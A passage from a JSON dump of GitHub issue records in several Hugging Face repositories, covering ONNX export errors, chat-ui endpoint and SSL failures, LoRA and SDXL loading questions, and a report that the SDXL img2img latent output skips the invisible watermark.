zero-shot-object-detection object_detection/owlvit_onnx` \r\nI'm able to get a converted ONNX format. Then, when using the following code to perform inference with the converted model:\r\n`checkpoint = \"google/owlvit-base-patch32\"`\r\n`processor = AutoProcessor.from_pretrained(checkpoint)`\r\n\r\n`image = skimage.data.astronaut()`\r\n`image = Image.fromarray(np.uint8(image)).convert(\"RGB\")`\r\n`text_queries = [\"human face\", \"rocket\", \"nasa badge\", \"star-spangled banner\", \"woman\", \"smile\", \"hair\", 'human head', 'human eye']`\r\n\r\n`np_inputs = processor(text=text_queries, images=image, return_tensors=\"np\")`\r\n`session = ort.InferenceSession(\"object_detection/owlvit_onnx/model.onnx\")`\r\n\r\n`out =session.run(['logits', 'pred_boxes', 'text_embeds', 'image_embeds'], np_inputs)`\r\n\r\nI get the following error: \r\n`RuntimeException: [ONNXRuntimeError] : 6 : RUNTIME_EXCEPTION : Non-zero status code returned while running Reshape node. Name:'/Reshape_3' Status Message: /Users/runner/work/1/s/onnxruntime/core/providers/cpu/tensor/reshape_helper.h:41 onnxruntime::ReshapeHelper::ReshapeHelper(const onnxruntime::TensorShape &, onnxruntime::TensorShapeVector &, bool) gsl::narrow_cast(input_shape.Size()) == size was false. The input tensor cannot be reshaped to the requested shape. Input shape:{9,16}, requested shape:{2,4,16}`\r\n\r\nNow it seems to be related to some input being wrong, but I cannot get what is wrong. The pre-processing step is the same as for the HF model, the only difference being instead of returning \"pt\" tensors I'm returning \"np\" so it can work with ONNX. Here are my input shapes:\r\n\r\ninput_ids: (9, 16)\r\nattention_mask: (9, 16)\r\npixel_values: (1, 3, 768, 768)\r\n\r\nThanks in advance!\n\n### Expected behavior\n\nInference to run successfully and outputs to be very similar to that of the original torch model. ", "url": "https://github.com/huggingface/optimum/issues/1183", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-12T13:20:12Z", "updated_at": "2024-07-27T14:27:58Z", "comments": 9, "user": "Pedrohgv" }, { "repo": "huggingface/chat-ui", "number": 341, "title": "SSL Wrong version number error", "body": "i have added this\r\n\"endpoints\": [\r\n {\"url\": \"http://127.0.0.1:8080/generate_stream\", \"weight\": 100}\r\n ],\r\n\r\nin the model but i am getting this error\r\n\r\nTypeError: fetch failed\r\n at fetch (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/undici/index.js:109:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/node_modules/@sveltejs/kit/src/runtime/server/fetch.js:32:10)\r\n at async POST (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/src/routes/conversation/[id]/+server.ts:91:16)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22 {\r\n cause: [Error: C0770BE8547F0000:error:0A00010B:SSL routines:ssl3_get_record:wrong version number:../deps/openssl/openssl/ssl/record/ssl3_record.c:355:\r\n ] {\r\n library: 'SSL routines',\r\n reason: 'wrong version number',\r\n code: 'ERR_SSL_WRONG_VERSION_NUMBER'\r\n }\r\n}\r\nError: aborted\r\n at connResetException (node:internal/errors:717:14)\r\n at abortIncoming (node:_http_server:754:17)\r\n at socketOnClose (node:_http_server:748:3)\r\n at Socket.emit (node:events:525:35)\r\n at TCP. (node:net:322:12) {\r\n code: 'ECONNRESET'\r\n}", "url": "https://github.com/huggingface/chat-ui/issues/341", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-12T04:40:58Z", "updated_at": "2023-09-18T14:00:27Z", "comments": 4, "user": "swikrit21" }, { "repo": "huggingface/diffusers", "number": 4054, "title": "[SD-XL] How to apply invisible-watermark for latent output", "body": "### Describe the bug\n\nAs a part of the license with SAI, we need to ensure the invisible watermark is applied across all images output by these models, including the Img2Img pipeline.\n\n### Reproduction\n\n```py\r\n # if xformers or torch_2_0 is used attention block does not need\r\n # to be in float32 which can save lots of memory\r\n if use_torch_2_0_or_xformers:\r\n self.vae.post_quant_conv.to(latents.dtype)\r\n self.vae.decoder.conv_in.to(latents.dtype)\r\n self.vae.decoder.mid_block.to(latents.dtype)\r\n else:\r\n latents = latents.float()\r\n if not output_type == \"latent\":\r\n image = self.vae.decode(latents / self.vae.config.scaling_factor, return_dict=False)[0]\r\n else:\r\n image = latents\r\n return StableDiffusionXLPipelineOutput(images=image)\r\n```\r\n\r\nthe relevant portion of the img2img pipeline code.\r\n\r\nin the XL pipeline, the latent output mode does not have the watermark applied - so, it is easily bypassed.\n\n### Logs\n\n```shell\nN/A\n```\n\n\n### System Info\n\nGit main branch.\n\n### Who can help?\n\ncc: @sayakpaul ", "url": "https://github.com/huggingface/diffusers/issues/4054", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-12T03:58:04Z", "updated_at": "2023-07-12T10:21:29Z", "user": "bghira" }, { "repo": "huggingface/transformers.js", "number": 192, "title": "Table Question Answering Support?", "body": "Hi - Interested in support for table question answering models. It's noted that these aren't supported, but is there any reason they wouldn't work if leveraged?\r\n", "url": "https://github.com/huggingface/transformers.js/issues/192", "state": "open", "labels": [ "question" ], "created_at": "2023-07-12T01:12:07Z", "updated_at": "2023-07-13T16:18:19Z", "user": "timtutt" }, { "repo": "huggingface/peft", "number": 685, "title": "Matrix mistmatch when trying to adapt Falcon with QLoRA, how to fix?", "body": "### System Info\n\n```\r\n(data_quality) brando9~ $ python collect_env.py\r\nCollecting environment information...\r\nPyTorch version: 2.0.1\r\nIs debug build: False\r\nCUDA used to build PyTorch: 11.7\r\nROCM used to build PyTorch: N/A\r\n\r\nOS: Ubuntu 20.04.4 LTS (x86_64)\r\nGCC version: (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0\r\nClang version: Could not collect\r\nCMake version: version 3.26.4\r\nLibc version: glibc-2.31\r\n\r\nPython version: 3.10.11 (main, May 16 2023, 00:28:57) [GCC 11.2.0] (64-bit runtime)\r\nPython platform: Linux-5.4.0-122-generic-x86_64-with-glibc2.31\r\nIs CUDA available: True\r\nCUDA runtime version: 11.7.64\r\nCUDA_MODULE_LOADING set to: LAZY\r\nGPU models and configuration:\r\nGPU 0: NVIDIA A100-SXM4-80GB\r\nGPU 1: NVIDIA A100-SXM4-80GB\r\nGPU 2: NVIDIA A100-SXM4-80GB\r\nGPU 3: NVIDIA A100-SXM4-80GB\r\nGPU 4: NVIDIA A100-SXM4-80GB\r\nGPU 5: NVIDIA A100-SXM4-80GB\r\nGPU 6: NVIDIA A100-SXM4-80GB\r\nGPU 7: NVIDIA A100-SXM4-80GB\r\n\r\nNvidia driver version: 515.43.04\r\ncuDNN version: Could not collect\r\nHIP runtime version: N/A\r\nMIOpen runtime version: N/A\r\nIs XNNPACK available: True\r\n\r\nCPU:\r\nArchitecture: x86_64\r\nCPU op-mode(s): 32-bit, 64-bit\r\nByte Order: Little Endian\r\nAddress sizes: 48 bits physical, 48 bits virtual\r\nCPU(s): 128\r\nOn-line CPU(s) list: 0-127\r\nThread(s) per core: 2\r\nCore(s) per socket: 32\r\nSocket(s): 2\r\nNUMA node(s): 2\r\nVendor ID: AuthenticAMD\r\nCPU family: 25\r\nModel: 1\r\nModel name: AMD EPYC 7543 32-Core Processor\r\nStepping: 1\r\nFrequency boost: enabled\r\nCPU MHz: 3455.484\r\nCPU max MHz: 2800.0000\r\nCPU min MHz: 1500.0000\r\nBogoMIPS: 5599.81\r\nVirtualization: AMD-V\r\nL1d cache: 2 MiB\r\nL1i cache: 2 MiB\r\nL2 cache: 32 MiB\r\nL3 cache: 512 MiB\r\nNUMA node0 CPU(s): 0-31,64-95\r\nNUMA node1 CPU(s): 32-63,96-127\r\nVulnerability Itlb multihit: Not affected\r\nVulnerability L1tf: Not affected\r\nVulnerability Mds: Not affected\r\nVulnerability Meltdown: Not affected\r\nVulnerability Mmio stale data: Not affected\r\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\r\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\r\nVulnerability Spectre v2: Mitigation; Retpolines, IBPB conditional, IBRS_FW, STIBP always-on, RSB filling\r\nVulnerability Srbds: Not affected\r\nVulnerability Tsx async abort: Not affected\r\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm constant_tsc rep_good nopl nonstop_tsc cpuid extd_apicid aperfmperf pni pclmulqdq monitor ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw ibs skinit wdt tce topoext perfctr_core perfctr_nb bpext perfctr_llc mwaitx cpb cat_l3 cdp_l3 invpcid_single hw_pstate ssbd mba ibrs ibpb stibp vmmcall fsgsbase bmi1 avx2 smep bmi2 invpcid cqm rdt_a rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local clzero irperf xsaveerptr wbnoinvd arat npt lbrv svm_lock nrip_save tsc_scale vmcb_clean flushbyasid decodeassists pausefilter pfthreshold v_vmsave_vmload vgif umip pku ospke vaes vpclmulqdq rdpid overflow_recov succor smca\r\n\r\nVersions of relevant libraries:\r\n[pip3] numpy==1.25.0\r\n[pip3] torch==2.0.1\r\n[pip3] torchaudio==2.0.2\r\n[pip3] torchvision==0.15.2\r\n[pip3] triton==2.0.0\r\n[conda] blas 1.0 mkl\r\n[conda] ffmpeg 4.3 hf484d3e_0 pytorch\r\n[conda] mkl 2023.1.0 h6d00ec8_46342\r\n[conda] mkl-service 2.4.0 py310h5eee18b_1\r\n[conda] mkl_fft 1.3.6 py310h1128e8f_1\r\n[conda] mkl_random 1.2.2 py310h1128e8f_1\r\n[conda] numpy 1.25.1 pypi_0 pypi\r\n[conda] numpy-base 1.25.0 py310hb5e798b_0\r\n[conda] pytorch 2.0.1 py3.10_cuda11.7_cudnn8.5.0_0 pytorch\r\n[conda] pytorch-cuda 11.7 h778d358_5 pytorch\r\n[conda] pytorch-mutex 1.0 cuda pytorch\r\n[conda] torchaudio 2.0.2 py310_cu117 pytorch\r\n[conda] torchtriton 2.0.0 py310 pytorch\r\n[conda] torchvision 0.", "url": "https://github.com/huggingface/peft/issues/685", "state": "closed", "labels": [], "created_at": "2023-07-11T20:01:37Z", "updated_at": "2023-07-24T00:11:02Z", "user": "brando90" }, { "repo": "huggingface/diffusers", "number": 4047, "title": "How to set lora scale when loading a LoRA model?", "body": "Hey there, first of all thanks for your fantastic work!\r\n\r\nI am loading LoRA weights, and I would like to set the scale of them being applied. Checking the code, it appears to be possible as shown [here](https://github.com/huggingface/diffusers/blob/fc7aa64ea8f5979b67bd730777e8e1c32e3adb05/src/diffusers/loaders.py#L1094).\r\n\r\nHow can we do it in practice? Is it possible to provide a small code snippet? \r\n\r\nThank you so much! Really appreciate your help :)", "url": "https://github.com/huggingface/diffusers/issues/4047", "state": "closed", "labels": [], "created_at": "2023-07-11T17:38:05Z", "updated_at": "2023-08-29T05:30:44Z", "user": "pietrobolcato" }, { "repo": "huggingface/diffusers", "number": 4042, "title": "How to combine the reference-only with inpainting and depth control?", "body": "### Model/Pipeline/Scheduler description\n\nHi, I recently want to combine the reference-only with image inpaint , with depth control to replace background for portrait images. However, I have no idea to build this pipeline as for there is no reference with inpaint pipeline example. Could you please help me to figure it out?\n\n### Open source status\n\n- [ ] The model implementation is available\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4042", "state": "closed", "labels": [], "created_at": "2023-07-11T12:17:24Z", "updated_at": "2023-07-14T06:12:29Z", "user": "AmberCheng" }, { "repo": "huggingface/chat-ui", "number": 340, "title": "[WebSearch] \"Input validation error: `inputs` tokens + `max_new_tokens` must be <= 1512. Given: 1000 `inputs` tokens and 1024 `max_new_tokens`\"", "body": "Hello there, \r\n\r\nTitle says it all. \r\nWe are not using any custom endpoints/models. We're just relying on the HuggingFace's API inferences. \r\nIs there a way to increase/decrease the inputs token when using WebSearch (or even just increase the max sum)? Because it works fine if `max_new_tokens` is set to 512 BUT it, obviously, cuts any answer getting upper these numbers. \r\nSo far, I didn't find a good balance neither how to decrease the number of tokens of the input. \r\n\r\nIn advance, thanks for your answer! \r\n![image](https://github.com/huggingface/chat-ui/assets/109650634/dbc25ae1-d894-48a7-8b0c-5a0bdad33e3e)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/340", "state": "closed", "labels": [ "question", "models" ], "created_at": "2023-07-11T07:33:18Z", "updated_at": "2023-07-12T09:16:21Z", "user": "gollumeo" }, { "repo": "huggingface/diffusers", "number": 4029, "title": "How can I make diffuser pipeline to use .safetensors file for SDXL?", "body": "Cloning entire repo is taking 100 GB\r\n\r\nHow can I make below code to use .safetensors file instead of diffusers?\r\n\r\nLets say I have downloaded my safetensors file into path.safetensors\r\n\r\nHow to provide it? \r\n\r\nThe below code working but we are cloning 100 GB instead of just single 14 GB safetensors. Waste of bandwidth\r\n\r\n**Also how can I add a LoRA checkpoint to this pipeline? a LoRA checkpoint made by Kohya script**\r\n\r\n```\r\nimport gradio as gr\r\n\r\nfrom diffusers import DiffusionPipeline\r\nimport torch\r\n\r\nimport base64\r\nfrom io import BytesIO\r\nimport os\r\nimport gc\r\nfrom datetime import datetime\r\n\r\nfrom share_btn import community_icon_html, loading_icon_html, share_js\r\n\r\n# SDXL code: https://github.com/huggingface/diffusers/pull/3859\r\n\r\nmodel_dir = '/workspace'\r\naccess_token = os.getenv(\"ACCESS_TOKEN\")\r\n\r\nif model_dir:\r\n # Use local model\r\n model_key_base = os.path.join(model_dir, \"stable-diffusion-xl-base-0.9\")\r\n model_key_refiner = os.path.join(model_dir, \"stable-diffusion-xl-refiner-0.9\")\r\nelse:\r\n model_key_base = \"stabilityai/stable-diffusion-xl-base-0.9\"\r\n model_key_refiner = \"stabilityai/stable-diffusion-xl-refiner-0.9\"\r\n\r\n# Use refiner (enabled by default)\r\nenable_refiner = os.getenv(\"ENABLE_REFINER\", \"true\").lower() == \"true\"\r\n# Output images before the refiner and after the refiner\r\noutput_images_before_refiner = True\r\n\r\n# Create public link\r\nshare = os.getenv(\"SHARE\", \"false\").lower() == \"true\"\r\n\r\nprint(\"Loading model\", model_key_base)\r\npipe = DiffusionPipeline.from_pretrained(model_key_base, torch_dtype=torch.float16, use_auth_token=access_token)\r\n\r\n#pipe.enable_model_cpu_offload()\r\npipe.to(\"cuda\")\r\n\r\n# if using torch < 2.0\r\npipe.enable_xformers_memory_efficient_attention()\r\n\r\n\r\n\r\n# pipe.unet = torch.compile(pipe.unet, mode=\"reduce-overhead\", fullgraph=True)\r\n\r\nif enable_refiner:\r\n print(\"Loading model\", model_key_refiner)\r\n pipe_refiner = DiffusionPipeline.from_pretrained(model_key_refiner, torch_dtype=torch.float16, use_auth_token=access_token)\r\n #pipe_refiner.enable_model_cpu_offload()\r\n pipe_refiner.to(\"cuda\")\r\n\r\n # if using torch < 2.0\r\n pipe_refiner.enable_xformers_memory_efficient_attention()\r\n\r\n # pipe_refiner.unet = torch.compile(pipe_refiner.unet, mode=\"reduce-overhead\", fullgraph=True)\r\n\r\n# NOTE: we do not have word list filtering in this gradio demo\r\n\r\n\r\n\r\nis_gpu_busy = False\r\n\r\ndef infer(prompt, negative, scale, samples=4, steps=50, refiner_strength=0.3, num_images=1):\r\n prompt, negative = [prompt] * samples, [negative] * samples\r\n images_b64_list = []\r\n\r\n for i in range(0, num_images):\r\n images = pipe(prompt=prompt, negative_prompt=negative, guidance_scale=scale, num_inference_steps=steps).images\r\n os.makedirs(r\"stable-diffusion-xl-demo/outputs\", exist_ok=True)\r\n gc.collect()\r\n torch.cuda.empty_cache()\r\n \r\n\t\t\r\n if enable_refiner:\r\n if output_images_before_refiner:\r\n for image in images:\r\n buffered = BytesIO()\r\n image.save(buffered, format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\r\n \r\n image_b64 = (f\"data:image/jpeg;base64,{img_str}\")\r\n images_b64_list.append(image_b64)\r\n\r\n images = pipe_refiner(prompt=prompt, negative_prompt=negative, image=images, num_inference_steps=steps, strength=refiner_strength).images\r\n\r\n gc.collect()\r\n torch.cuda.empty_cache()\r\n\r\n # Create the outputs folder if it doesn't exist\r\n \r\n\r\n for i, image in enumerate(images):\r\n buffered = BytesIO()\r\n image.save(buffered, format=\"JPEG\")\r\n img_str = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\r\n timestamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\n image_b64 = (f\"data:image/jpeg;base64,{img_str}\")\r\n images_b64_list.append(image_b64)\r\n # Save the image as PNG with unique timestamp\r\n filename = f\"stable-diffusion-xl-demo/outputs/generated_image_{timestamp}_{i}.png\"\r\n image.save(filename, format=\"PNG\")\r\n\r\n return images_b64_list\r\n\r\n```\r\n\r\n ", "url": "https://github.com/huggingface/diffusers/issues/4029", "state": "closed", "labels": [], "created_at": "2023-07-10T21:52:22Z", "updated_at": "2023-12-11T18:45:18Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 337, "title": "Feature Request: Save messages and error message even if text generation endpoint fails", "body": "Situation: Text generation endpoint is not running. Then user sends a message.\r\nCurrent Behavior: UI throws an error and saves conversation to mongodb like this, with an empty message list.\r\n```\r\n{\r\n _id: ObjectId('64ac1abc2ac09222e24cc984'),\r\n title: 'Untitled 5',\r\n messages: [],\r\n model: 'GPT',\r\n createdAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n updatedAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n sessionId: '0048fb5c-a224-49c2-a7be-ea417defa6e2'\r\n}\r\n```\r\n\r\nDesired behavior: UI throws an error and saves conversation to mongodb with the user's message and the error message inside.\r\n```\r\n{\r\n _id: ObjectId('64ac1abc2ac09222e24cc984'),\r\n title: 'Untitled 5',\r\n messages: [\r\n {\r\n content: 'What is 2-2?',\r\n from: 'user',\r\n id: '874cfd40-2c61-49fe-b9f6-8b296a79ab6a',\r\n },\r\n {\r\n from: 'assistant',\r\n error: 'TypeError: fetch failed\r\n at fetch (C:\\chat-ui\\node_modules\\undici\\index.js:109:13)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async eval (/node_modules/@sveltejs/kit/src/runtime/server/fetch.js:32:10)\r\n at async POST (/src/routes/conversation/[id]/+server.ts:90:16)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///C:/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22 {\r\n cause: Error: connect ECONNREFUSED 127.0.0.1:80\r\n at TCPConnectWrap.afterConnect [as oncomplete] (node:net:1532:16) {\r\n errno: -4078,\r\n code: 'ECONNREFUSED',\r\n syscall: 'connect',\r\n address: '127.0.0.1',\r\n port: 80\r\n }\r\n}\r\n },\r\n ],\r\n model: 'GPT',\r\n createdAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n updatedAt: ISODate('2023-07-10T14:50:36.324Z'),\r\n sessionId: '0048fb5c-a224-49c2-a7be-ea417defa6e2'\r\n}\r\n```", "url": "https://github.com/huggingface/chat-ui/issues/337", "state": "closed", "labels": [ "enhancement", "back", "p2" ], "created_at": "2023-07-10T15:18:52Z", "updated_at": "2023-10-10T11:16:22Z", "comments": 1, "user": "loganlebanoff" }, { "repo": "huggingface/transformers.js", "number": 187, "title": "[Question] Performance and size of models", "body": "Great project, tons of potential! I have a general question I thought I may ask. Using the convert.py scripts, I took a Pytorch model and converted it to ONNX. With quantizing, I get a full 428MB model and a 110MB _quantized model. Now how does it work for the user exactly? Does the user automatically download the _quantized one?\r\n\r\nWould this be accurate:\r\n\r\n- WASM downloaded/loaded (e.g., 15MB)\r\n- Transformers.js runs the core\r\n- Model downloaded/load (e.g., 110MB)\r\n- Model starts and runs\r\n- Result is returned\r\n- (next time it is called, WASM is reloaded and model is cached)\r\n\r\n125MB is still quite big for the web: [https://huggingface.co/plopop/industry-classification-api-onnx](https://huggingface.co/plopop/industry-classification-api-onnx)\r\n\r\nWith something like [https://huggingface.co/Xenova/mobilebert-uncased-mnli](https://huggingface.co/Xenova/mobilebert-uncased-mnli) (27MB), running everything within a worker takes 8-15seconds depending on the input from our end right now - is there any other performance gains that can be saved, or would the only way be to optimize the source model further?", "url": "https://github.com/huggingface/transformers.js/issues/187", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-10T14:39:31Z", "updated_at": "2023-07-11T17:06:38Z", "user": "sabatale" }, { "repo": "huggingface/chat-ui", "number": 336, "title": "how to work in chat-ui with non streaming data?", "body": "I was working in a chat-ui by providing my endpoints only which is hosted in a localhost:8000/generate. I dont have any model but endpoints only so can you provide me a solution for working in only endpoints and non streaming data( application/json or application/plain). I have model hosted in this server.\r\n\r\nin modelEndpoint.ts\r\nif (!model.endpoints) {\r\n\t\treturn {\r\n\t\t\turl: `http://10.0.2.27:8000/generate`,\r\n\t\t\t// authorization: `Bearer ${HF_ACCESS_TOKEN}`,\r\n\t\t\t// weight: 1,\r\n\t\t};\r\n\t}\r\nin \r\n\r\nError: An error occurred while fetching the blob\r\n at request (file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@huggingface/inference/dist/index.mjs:89:11)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async Proxy.textGeneration (file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@huggingface/inference/dist/index.mjs:457:15)\r\n at async Module.generateFromDefaultEndpoint (/src/lib/server/generateFromDefaultEndpoint.ts:22:28)\r\n at async POST (/home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/src/routes/conversation/[id]/summarize/+server.ts:30:26)\r\n at async Module.render_endpoint (/node_modules/@sveltejs/kit/src/runtime/server/endpoint.js:47:20)\r\n at async resolve (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:388:17)\r\n at async Object.handle (/src/hooks.server.ts:66:20)\r\n at async Module.respond (/node_modules/@sveltejs/kit/src/runtime/server/respond.js:259:20)\r\n at async file:///home/fm-pc-lt-215/Desktop/chat-ui/chat-ui/node_modules/@sveltejs/kit/src/exports/vite/dev/index.js:506:22\r\n", "url": "https://github.com/huggingface/chat-ui/issues/336", "state": "closed", "labels": [], "created_at": "2023-07-10T13:43:17Z", "updated_at": "2023-07-11T08:29:40Z", "user": "swikrit21" }, { "repo": "huggingface/transformers.js", "number": 186, "title": "[Question] How to interpret boxes in object detection example ?", "body": "hi,\r\n\r\ncan anyone help me how to interpret boxes while using object detection with this model \"Xenova/detr-resnet-50\".\r\ni want to crop out the detected object from the image using sharp (nodejs) ? how can i pass these boxes to sharp resize function ? \r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/186", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-10T12:59:22Z", "updated_at": "2023-07-11T00:55:13Z", "user": "geminigeek" }, { "repo": "huggingface/chat-ui", "number": 335, "title": "Bug: Unexpected execution result on Firefox browser with Chat-UI ver. 0.3.0", "body": "I recently installed the 0.3.0 version of the HF Chat-UI software. \r\nI then performed an evaluation using the **HuggingFaceH4/starchat-beta** model. \r\nAt that time, I typed the question \"_Could you tell me about the weather in Toyko City in Japan on July-10-2023_?\" and ran it.\r\n\r\n\r\nUnfortunately, the results varied between browsers. \r\nIn the Firefox browser, the result is displayed normally. \r\nHowever, the following error occurs in the Chrome browser. \r\n\r\n* **Error message:** \r\n```\r\n403 You don't have access to this conversation. \r\nIf someone gave you this link, ask them to use the 'share' feature instead.\r\n```\r\n\r\n\r\nI was wondering if anyone else is experiencing the same issue, any comments are welcome.\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/335", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-10T04:40:40Z", "updated_at": "2023-09-11T09:32:14Z", "comments": 2, "user": "leemgs" }, { "repo": "huggingface/chat-ui", "number": 334, "title": "Chat-ui is starting, but nothing happends", "body": "# Description:\r\n\r\nWhen starting the Chat-ui, the initialization process begins as expected but stalls indefinitely, without any evident progress. The application doesn't crash nor gives any errors. This issue occurs across multiple attempts, regardless of browser type or device.\r\n\r\n# Steps to reproduce:\r\n- Install prerequisites\r\n- Fill evn.local file\r\n- Lauch a DB container for chat persistance\r\n- Start Chat-UI\r\n- Open a browser (e.g., Chrome, Firefox, Safari)\r\n- Navigate to the Chat-ui web address.\r\n- Observe the behavior.\r\n\r\n# Expected result:\r\n\r\nAfter navigating to the url, the Chat-ui should initialize and allow for the use of its various functionalities.\r\n\r\n# Actual result:\r\n\r\nThe UI remains in a state of 'loading' indefinitely without any change, timing out after some time.\r\n\r\n# Environment:\r\nThis issue was reproduced on:\r\n1. Operating System: Ubuntu 22.04, Fedora Workstation 38\r\n2. Node Version: v18.16.1\r\n3. NPM Version: 9.5.1\r\n\r\nAdditional context:\r\n- No error messages are displayed.\r\n- There is no notable console log information.\r\n- Network status is stable during the process.\r\n- Similar behavior noticed on Fedora.\r\n- Refreshing the browser, clearing the cache, or using a different browser does not resolve the issue.\r\n- Firewall is disabled on host\r\n\r\nIf you need any further information, I would be glad to provide it. Thanks in advance!", "url": "https://github.com/huggingface/chat-ui/issues/334", "state": "closed", "labels": [ "support" ], "created_at": "2023-07-09T13:53:34Z", "updated_at": "2023-09-11T09:31:49Z", "comments": 2, "user": "Notespeak" }, { "repo": "huggingface/diffusers", "number": 3988, "title": "how to use part of the controlnet models with a \"StableDiffusionControlNetInpaintPipeline\" object?", "body": "I created a \"StableDiffusionControlNetInpaintPipeline\" object with a list of controlnet models such as \"canny\",\"openpose\", but sometimes I want to use canny only or openpose only.Is there's a way to reuse part of the controlnet models with a already inited \"StableDiffusionControlNetInpaintPipeline\" object?", "url": "https://github.com/huggingface/diffusers/issues/3988", "state": "closed", "labels": [], "created_at": "2023-07-07T09:18:18Z", "updated_at": "2023-08-01T04:51:41Z", "user": "AdamMayor2018" }, { "repo": "huggingface/optimum-habana", "number": 292, "title": "Where in the directory \"/tmp/tst-summarization\", is the summarization output stored? ", "body": "### System Info\n\n```shell\nOptimum Habana : 1.6.0\r\nSynapseAI : 1.10.0\r\nDocker Image : Habana\u00ae Deep Learning Base AMI (Ubuntu 20.04)\r\nVolume : 1000 GiB\n```\n\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nStart an EC2 instance with DL1 Resource and this image : Habana\u00ae Deep Learning Base AMI (Ubuntu 20.04)\r\nRun these commands\r\na. docker run -it --runtime=habana -e HABANA_VISIBLE_DEVICES=all -e OMPI_MCA_btl_vader_single_copy_mechanism=none --cap-add=sys_nice --net=host --ipc=host vault.habana.ai/gaudi-docker/1.10.0/ubuntu20.04/habanalabs/pytorch-installer-2.0.1:latest\r\nb. git clone https://github.com/huggingface/optimum-habana.git\r\nc. pip install optimum[habana]\r\nd. cd examples\r\ne. cd summarization\r\nf. pip install -r requirements.txt\r\n\r\npython run_summarization.py \\\r\n --model_name_or_path t5-small \\\r\n --do_eval \\\r\n --dataset_name cnn_dailymail \\\r\n --dataset_config \"3.0.0\" \\\r\n --source_prefix \"summarize: \" \\\r\n --output_dir /tmp/tst-summarization \\\r\n --per_device_train_batch_size 4 \\\r\n --per_device_eval_batch_size 4 \\\r\n --overwrite_output_dir \\\r\n --predict_with_generate \\\r\n --use_habana \\\r\n --use_lazy_mode \\\r\n --use_hpu_graphs_for_inference \\\r\n --gaudi_config_name Habana/t5 \\\r\n --ignore_pad_token_for_loss False \\\r\n --pad_to_max_length \\\r\n --save_strategy epoch \\\r\n --throughput_warmup_steps 3\r\n\n\n### Expected behavior\n\nNeed a file with the summarized text and not just the evaluation metrics", "url": "https://github.com/huggingface/optimum-habana/issues/292", "state": "closed", "labels": [ "bug" ], "created_at": "2023-07-07T03:24:31Z", "updated_at": "2023-07-18T08:30:21Z", "user": "Abhaycnvrg" }, { "repo": "huggingface/trl", "number": 503, "title": "How to get labels into the SFTTrainer", "body": "Hi!\r\nI am trying to prompt tune medalpaca 7b using prompt tuning or lora with the SFTTrainer. I have a prompt and I have labels that I want the model to output. I have made a Dataset class that inherits from torch.utils.data.Dataset to prepare my inputs, but I am wondering, if there is some way to make the trainer use the datapoint[\"labels\"] part during training? :\r\nclass DiagnosesDataset(torch.utils.data.Dataset):\r\n\tdef __init__(self, instances, tokenizer):\r\n\t\tself.instances=instances\r\n\t\t#self.labels=labels\r\n\t\tself.tokenizer=tokenizer\r\n\t\t\r\n\tdef __getitem__(self, idx):\r\n\t\titem={}\r\n\t\tprompt= self.instances[\"prompt\"][idx]\r\n\t\tlabels = 